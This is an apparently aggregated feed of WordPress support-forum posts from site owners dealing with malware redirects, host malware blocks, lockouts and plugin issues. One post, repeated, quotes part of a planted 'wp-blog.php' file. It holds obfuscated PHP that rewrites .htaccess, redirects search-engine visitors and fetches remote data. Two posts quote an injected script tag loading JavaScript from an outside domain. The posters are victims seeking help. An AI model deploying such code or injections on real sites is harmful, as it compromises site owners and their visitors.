There is a malware redirect on my website, which redirects me even when trying to use the wordpress editor for editing the site and fixing the issue. I can login and I can see the wordpress environment for a moment, but then I’m being redirected. I have read all the other help threads on malware redirects, but the problem is that I am not able to edit the site (update, backup, etc.) due to the redirect. Can anyone help?
↧
Malware redirect: Unable to edit page
↧
WordPress site redirected to another site
Hello, Need some help here my WordPress site has been redirecting to another website since yesterday and I don’t know how to fix it. I try to find the script in the project file and WordPress database but no luck at all.
thank you for ur help here.
↧
↧
Access Denied
Hi
I’ve inadvertently blocked access to one of our websites by activating a couple of settings in mini-orange 2FA. I was exploring the other options on the dashboard and I think because I tried setting protect wp_config file and htaccess (amongst others) I’ve damaged the setup.
I’ve tried disabling the plugin through the database, but I don’t have enough knowledge of the other wp_options which may also be causing the problem.
I can’t currently get to the wordpress login. Any help would be appreciated.
Regards
Julie
↧
Guys, love your work… But take care of those updates
Hey guys,
I think it’s been now 5 or 6 times that a new update shows up in WordPress.
It doesn’t inspire much trust to see so many updates in a row.
↧
Malware-Scan
Hallo,
mein Hoster hat mir eine Nachricht geschickt und die Seite blockiert:
Folgende Datei wurde aufgrund von Malware/Angriffe zum Schutz der Systeme blockiert:
XXXX/wp-content/plugins/offen/templates/widget/style5.php
↧
↧
Having to reset permalinks due to 404 errors multiple times a day
Hey folks, hoping y’all might have some ideas on how to fix this. I had someone attack my website with a phished login back in december and post a phishing page. I deleted all the pages and malware by hand, and reset all passwords. No security issues since then. However, ever since then, my blog posts and pages have been breaking multiple times a day with the error
“Not Found
The requested URL /blog/ was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Resetting my permalinks fixes the problem, however it keeps occurring, sometimes multiple times a day. I’ve tried disabling all of my plugins and reverting my theme back to default 2019, that doesn’t work. I also tried resetting my .htaccess file, that also didn’t fix it.
My current .htaccess file is:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Use PHP70 as default
AddHandler application/x-httpd-php70 .php
<IfModule mod_suphp.c>
suPHP_ConfigPath /opt/php70/lib
</IfModule>
I’m currently running WordPress 5.3.2 with the Flatsome theme.
Help please! Pulling my hair out at this point!
↧
Security Question: Why am I getting so much suspicious traffic?
Hello,
My Wordfence security plugin shows that there are IP’s blocked from all over the world. I have Godaddy, and multiple WordPress sites on one host. Some sites have multiple IP blocks per day, while others 1 every couple of days.
The IP’s usually either go for /wp-login.php, or /xmlrpc.php. Wordfence lists them as Human, and sometimes bot.
Is all of this normal? Does everyone get bombarded by malicious traffic, or what is this?
If I transfer my WordPress sites to a new host, or to wordpress.com, would these “attacks” continue? Or is my hosting somehow compromised?
I don’t really know much about security, so any info would be of great help!
Thank you for reading.
↧
Strange file
I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:
@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
touch('.htaccess', $actime);
touch('wp-blog.php', $actime);
echo 'ok';
}
exit;
}
if (is_dir("wp-includes/Text/Diff/p")) {
$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";
$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
$redirect = 0;
$fof = '404 not found';
function getRealIpAddr() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];
if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";
if (ini_get('allow_url_fopen')) {
function get_data_ya($mmm) {
$data = file_get_contents($mmm);
return $data;
}
}There’s more, but this part looks like it’s doing something suspicious.
I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
↧
One of a kind and safest life saver wordpress security
Million stars to the maker of this plugin. I recommend the whole world to use tgis plugin
↧
↧
Malware Found on Custom-admin-interface.php
Dear all
my provider has notified me that in the code below there’s a malware.
/plugins/wp-custom-admin-interface/wp-custom-admin-interface.php
{HEX}Malware.Expert.generic.eval.base64.decode.41.UNOFFICIAL FOUND
↧
Website hacked thanks to the poor code of this plugin
Website hacked thanks to the poor code of this plugin
Avoid this plugin at all costs if you don’t want your website to be hacked
↧
Malware because of InfiniteWP Client
Hi,
The communication of the security issue arrived too late for me. No mail or what so ever. One of my clients had to notify me. Quite awkward.
I have a couple of infected websites all on 1 server. Each time when i clean them up they get infected again within a couple of hours. Removing the malicious codes doesn’t seem to be enough. I’m missing some spots. But I have no idea where.
Why don’t you have any solution shared with us?! Can you give me a manual for how to clean up my websites/server?
Thanks!
↧
Can’t update from 5.3.10
Hi,
I’m having issues trying to update this plugin from 5.3.10 to 5.3.13.
The Plugin page prompts me that this plugin has an update, although each time I click “update now” it proceeds as normal and starts to update although once I refresh the page, it prompts me to update again. I’ve tried it 4 times now.
Any ideas? the admin-ajax.php isn’t throwing any errors, although it keeps trying to update to 5.3.10 which is rather strange.
{"success":true,"data":{"update":"plugin","slug":"miniorange-2-factor-authentication","oldVersion":"Version 5.3.10","newVersion":"Version 5.3.10","plugin":"miniorange-2-factor-authentication\/miniorange_2_factor_settings.php","pluginName":"miniOrange 2 Factor Authentication"}}
↧
↧
chr() expects parameter 1 to be int, string given
chr() expects parameter 1 to be int, string given 1 +
wp-content/plugins/wp-security-pro/handler/login.php:62
Getting this PHP Notice when activate the Plugin.
↧
Infected With Malicious Redirect Malware
I’m helping my friend, with his new website.
As victims of daily bruteforce, (before we had Cloudflare firewalls rules), his WP credentials were breached. Our wordpress was up-to-date but our PHP was not at the time.
The bot created new ‘pages’ that cannot be seen in the WordPress dashboard.
I accidentally ran across it via Googling: site:hypelist.ca
**Check now and you will see it’s littered with Italian spam redirects from pages show as 404 errors (according to https://sitecheck.sucuri.net/)
Disregard the ‘other’ malware (rogueads.unwanted.ads) They’re scripts from an ad network.
I’ve located some of the malware. In my root directory, I have a folder
called: postnew (last modified 1969-12-31 lol)
postnew contains:
1. idlogs.txt
2. index.php
3. moban.html
When I delete this file, it appears again after a few minutes.
.htaccess: Our .htcaccess file appears compromised as well because of the Rewrite rules that are directed to postnew/index.php
Once again, when I delete the rewrite rules related to the above, it appears again.
I’ve even deleted the .htaccess file and create a new one via wordpress dashboard, no luck.
XML-RPC seems normal, but is it supposed to include: http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html near the top?
I’ve deleted a few plugin I thought could be an issue. Persists.
I’ve searched wp-includes, but would take forever to potentially find anything.
****When I deleted the postnew folder, My wp-admin page broke. Looks like this
When I use /wp-login.php I looks fine, upon successful login, it leads to the broken /wp-admin page.
I know some may suggest backup and reinstall WordPress. I’ve heard other online still had the issue after a clean install.
My friend attracted the malware, but I played around and broke the site even further.
Any help would be appreciated.
*note I do not have access to WordPress dashboard. Only Cpanel, FTP & Cloudflare.
I will try to respond ASAP to move this along quickly.
Thanks in advance and for your time.
↧
Malware found ioptimize.php
Hello Folks,
We have found a malicious plugin on several WordPress sites on several webhosts.
The plugin is called ioptimization, and would allow file uploads when opened directly (/wp-content/plugins/ioptimization/IOptimize.php). Luckily Wordfence is blocking this in our cases.
It does not seem to be because of another plugin, as websites with different plugins had this infection and on different servers, so I’m afraid this is a WordPress Core exploit.
This malicious plugin appeared 4 days ago (8 Feb), all around the same time.
So far, the damage has been minimal, but it’s more worrying this appeared in our sites in the first place.
I hope I posted this in the right place.
[malware code removed]
Hope this will be useful to someone
↧
Malicious activity
Hello
I found this link 4 times in my home page source code <script src=”//mikkymax.com/20ba4519da0cfb915b.js” async=”” type=”text/javascript”></script> , I search about it in my server code it doesn’t existe there, whene I did some research I found that is a Malicious activity.
I used iThemes Security and Wordfence but any malware are detected.
Any help please?
↧
↧
Malicious activity not detected
Hello
I found this link 4 times in my home page source code <script src=”//mikkymax.com/20ba4519da0cfb915b.js” async=”” type=”text/javascript”></script> , I search about it in my server code it doesn’t existe there, whene I did some research I found that is a Malicious activity.
I Wordfence but any malware was detected.
Any help please?
↧
Strange file
I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:
@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
touch('.htaccess', $actime);
touch('wp-blog.php', $actime);
echo 'ok';
}
exit;
}
if (is_dir("wp-includes/Text/Diff/p")) {
$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";
$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];
$redirect = 0;
$fof = '404 not found';
function getRealIpAddr() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];
if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;
$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";
if (ini_get('allow_url_fopen')) {
function get_data_ya($mmm) {
$data = file_get_contents($mmm);
return $data;
}
}There’s more, but this part looks like it’s doing something suspicious.
I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.
↧
Unable to load/edit using Elementor
Hi. We’ve just installed the 14-day trial Security by CleanTalk plugin, and we can’t seem to be able to edit my pages using Elementor.
Furthermore, 3 of our Elementor-based pages have been flagged as “Frontend malware”: https://family.org.my/?page_id=2098, https://family.org.my/?page_id=4481, https://family.org.my/?page_id=7191.
As a result, we have disabled the plugin so we’re able to continue our work.
Appreciate your help to resolve this.
↧